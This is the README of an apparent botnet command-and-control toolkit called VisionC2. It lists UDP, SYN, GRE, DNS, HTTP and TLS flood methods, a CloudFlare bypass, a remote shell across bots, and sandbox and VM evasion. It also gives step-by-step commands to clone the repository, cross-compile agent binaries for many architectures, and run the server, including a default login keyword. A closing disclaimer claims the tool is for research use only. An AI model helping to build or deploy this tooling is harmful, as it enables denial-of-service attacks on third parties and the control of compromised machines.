| Category | Feature | Description |
|---|---|---|
| C2 Interface (TUI) | Dashboard | Live bot count, CPU/RAM usage, download speed, uptime |
| Attack Builder | Configure attack method, target, and duration | |
| Remote Shell | Interactive shell (broadcast or per-bot) | |
| SOCKS5 Proxy | Built-in per-bot proxy management | |
| Help System | Integrated docs and command reference | |
| Security & Obfuscation | Encrypted Comms | TLS 1.2+ secured channels |
| C2 Obfuscation | Base64 → XOR → RC4 → checksum | |
| Evasion | Sandbox & VM detection | |
| Authentication | HMAC challenge/response | |
| Binary Safety | No plaintext C2 addresses | |
| Cross-Platform | Architectures | 14+ CPU architectures (Mips,x86,ARM,PPC,ETC) |
| OS Support | Linux, Windows, macOS | |
| Deployment | One-click setup |
| Method | Protocol | Description |
|---|---|---|
| UDP Flood | UDP | High-volume 1024-byte payload spam |
| TCP Flood | TCP | Connection exhaustion attack |
| SYN Flood | Raw TCP | SYN packets with random source ports |
| ACK Flood | Raw TCP | ACK packet flooding |
| GRE Flood | GRE (47) | GRE protocol packets with max payload |
| DNS Flood | UDP/DNS | Random DNS query types (A/AAAA/MX/NS) |
| Method | Description |
|---|---|
| HTTP Flood | GET/POST requests with randomized headers |
| HTTPS/TLS Flood | TLS handshake exhaustion with request bursts |
| CF Bypass | CloudFlare bypass via session/cookie reuse |
| Proxy Support | All L7 methods support proxy list integration |
# Ubuntu/Debian
sudo apt update && sudo apt install -y \
upx-ucl openssl git wget gcc python3 screen build-essential-
Clone the repository
git clone https://github.com/Syn2Much/VisionC2.git cd VisionC2 chmod +x *
-
Run interactive setup
python3 setup.py
The setup script will:
- Generate 4096-bit TLS certificates
- Create encryption keys and configuration
- Cross-compile binaries for all supported architectures
- Build the C2 server binary
-
Output locations
- C2 Server:
./server - Agent Binaries:
./bins/ - Configuration:
setup_config.txt
- C2 Server:
Option 1: TUI Mode (Recommended)
screen ./server- Detach:
Ctrl + A→D - Reattach:
screen -r
Option 2: Telnet/Multi-User Mode
screen ./server --split
nc your-server-ip 1337- User database:
cnc/users.json - Default login keyword:
spamtec
Agent Startup Sequence
──────────────────────
1. Security Checks
├─ VM detection
├─ Sandbox analysis
├─ Debugger detection
└─ Exit on positive detection
2. C2 Resolution
├─ Multi-layer address decryption
└─ DNS fallback chain (TXT/A records, direct IP)
3. Secure Handshake
├─ TLS 1.2+ encrypted connection
├─ HMAC authentication
└─ Registration payload submission
4. Command Loop
└─ Encrypted bidirectional communication
- Changelog:
Docs/CHANGELOG.md - Commands:
Docs/COMMANDS.md - Usage:
Docs/USAGE.md
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATIONAL PURPOSES ONLY
This software is intended for:
- Authorized penetration testing
- Security research and education
- Legitimate stress testing of owned systems
Usage of this tool for attacking targets without prior mutual consent is illegal. The developer assumes no liability and is not responsible for any misuse or damage caused by this program.
Syn
- GitHub: @syn2much
- Telegram: @sinackrst
Maintained with ❤️ by Syn
